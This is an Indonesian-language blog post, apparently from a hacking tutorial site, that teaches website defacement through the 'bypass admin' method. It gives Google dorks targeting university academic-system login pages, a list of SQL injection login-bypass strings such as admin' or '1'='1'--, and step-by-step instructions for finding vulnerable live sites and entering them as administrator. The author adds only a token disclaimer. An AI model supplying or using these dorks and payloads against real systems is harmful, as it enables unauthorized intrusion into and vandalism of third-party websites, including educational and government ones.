Halohaa brader, Deface/ing adalah sebuah kegiatan dalam menyisipkan file kedalam laman website tertentu, baik tampilan index maupun tampilan yang masih menyangkut dengan laman website tersebut (subdo). Dalam kegiatan ini biasanya dilakukan berdasarkan tujuannya masing-masing, seperti misal ingin mengungkapkan ekspresi di ruang lingkup internet. Pelaku/seseorang yang melakukan deface biasanya disebut dengan hacktivist, namun saat ini lebih dikenal dengan sebutan defacer.
Dalam dunia cyber, defacer terbagi menjadi 2 golongan, ada yang bersama dengan tim, ada juga yang melakukannya sendiri (solo player wkwk). Jumlah defacer di Indonesia ini sangatlah banyak, bahkan bisa bersaing dengan defacer dari negara lain. Saat ini yang kejadian viral bahkan membuat instansi pemerintahan kesulitan ialah, ketika para website dalam negeri bertumbangan dengan diubahnya halaman web tersebut dengan berbagai pesan yang disampaikan oleh sang defacer. Seperti contohnya dalam aksi menyuarakan kekecewaan terhadap pemerintah Indonesia.
Saya sudah sering dalam memberikan materi deface berbagai metode, namun kali ini menggunakan bypass admin. Apa itu? Metode ini cukuplah mudah dibanding yang lain, karena kita hanya membutuhkan Dork, Username dan Password. Jadi ibaratnya kita masuk ke dalam website sebagai admin bukan user.
Bagaimana sob, menarik bukan? Kita langsung praktik aja ya sob hehe, silahkan ikuti caranya berikut ini, jika mengalami gagal/kesulitan dikomen aja ya sob.
Dork :
inurl / mnux=login admin
inurl / mnux=login powered by sisfo
inurl / mnux=login akademik administrasi akademik - universitas sisfokampus
inurl / mnux=login id /?mnux=login&lgn=frm siakad
inurl://admin login.php
Username dan Password Bypass Admin
or 1=1
or 1=1--
or 1=1#
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
Cara Deface Bypass Admin di Android
1. Silahkan buka browser kamu (chrome)
2. Kemudian silahkan pilih salah satu dork di atas, lalu salinkan ke browser
3. Tempel dork lalu lakukan pencarian dan tentukan salah satu target yang menurut kamu masih perawan
4. Jika kamu menemukan halaman login langsung saja eksekusi (Jika belum tau cara mencari admin login, bisa membaca artikel saya sebelumnya)
5. Silahkan isi user dan password yang sesuai hingga berhasil (pilih salah satu ya)
6. Jika kamu berhasil masuk, maka kamu sebagai seorang admin dalam website tersebut, selesai.
Saya tidak bertanggung jawab jika terjadi kerusakan pada website tersebut, gunakanlah dengan bijak, jika ingin deface saran saya hanya titipkan saja filenya bukan mengindex. Kemudian jika tidak vuln websitenya, silahkan cari target lainnya ya, karena memang ini metode lama, tapi setelah saya coba ternyata masih ada website yang vuln. Intinya sabar saja, dan jangan menyerah ya sob wkwk. See youu terima kasih
Tags
DEFACE